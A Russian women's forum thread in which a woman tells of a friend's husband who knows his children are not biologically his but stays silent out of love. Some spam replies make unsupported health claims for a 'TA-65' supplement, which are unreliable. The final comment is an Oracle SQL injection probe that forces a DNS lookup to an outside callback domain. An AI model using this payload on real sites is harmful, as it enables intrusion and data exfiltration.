ЖЕНСКИЙ форум без регистрации

Мужик
Идиот
Тряпка
Другое

Love is...

Мила | 14.08.2014, 20:54 | Просмотры: 29659
Знаю одну семью, точнее больше (по времени) знаю мужа так как вместе учились в одной школе в параллельных классах, ну и была одна дворовая шабла :). Теперь я подруга семьи и заодно крёстная старшего ребёнка. Суть ситуации в чём: семье уже 16 лет, двое детей - 12 лет и 9 лет. Детей соответственно оба хотели с самой свадьбы. Не получалось, знаю были проблемы у обоих, у неё шансов 50 на 50 (одна труба не проходима)и у него по-моему ещё меньше (что-то там со сперматозоидами). Лечились оба. Потом появился первый ребёнок, затем и второй. Я знаю, что оба ребёнка не от него. Во всяком случае так мать говорит. Пошла на это, чтобы семья стала полноценной и муж безумно хотел детей. Лет шесть-семь назад об этом узнал муж, не от жены, не от меня, не знаю откуда, не говорит. Об этом он мне проболтался как-то у них на даче по весне этого года. Пива перебрал немножко, и пока жена детей спать укладывала, разоткроветничался со мной. Говорит "живу с этим уже лет шесть, но не могу сказать об этом жене, так как безумно её люблю и не хочу делать кому-то больно". Суть его слов сводилась примерно к этому. Я, конечно, не сказала ему, что знаю об этом, да и его жене тоже не стала говорить, что он откуда-то всё узнал. По жизни могу сказать, что таких семей я практически не видела. Живут душа в душу, детей обожают. Крепкая и дружная семья. Зная его со школы, могу сказать, что за таким как за каменной стеной. Блин, побольше бы таких. Почему-то вспомнилась жевательная резинка из детства Love is... Просто захотелось поделиться историей из жизни и услышать мнение других об этом.
Реклама
Капитан Оргазм 21.08.2014
Мила, примите добрый совет - займитесь собственной жизнью и не суйте нос в чужую
Галина 25.09.2014
А мой секрет счастья - быть молодой и красивой! Для этого я пью комплекс TA-65, который активирует механизм восстановление организма на клеточном уровне (и это научно доказано).
Ксения 27.10.2014
Милые женщины, хочу поделиться с вами удивительным открытием ученых, которое изменило мою жизнь! Вот уже год как пью комплекс "ТА-65" и чувствую, что время повернулось вспять (во всяком случае на 53 года себя точно не ощущаю)!
Sony55 3.09.2016
никаких проблем во взаимопонимании не будет, когда вы раскошно выглядите. Я с мужем часто ссорилась по пустякам - потом приобрела пару обновочек на сайте soblazn64.ру и сразу все наладилось. Главное быть желанной и любимой)) И мне очень понравилось, что на сайте помогут с выбором, нет никакой предоплаты и весь ассортимент в наличии. Даже не пришлось ждать - посылку получила в течении нескольких дней
Так что - красивое белье от soblazn64 вскружит голову мужчине. Кстати, soblazn64 на сколько я знаю есть в Instagram
gxjyhhdf 25.04.2020
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.2065-203
37.2065.ca011.1.bxss'||'.me')||'

Имя:*